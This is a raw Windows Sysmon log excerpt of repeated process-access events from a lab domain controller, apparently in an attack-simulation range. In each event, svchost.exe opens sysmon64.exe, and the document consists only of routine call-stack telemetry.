08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.215{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.168{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.168{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 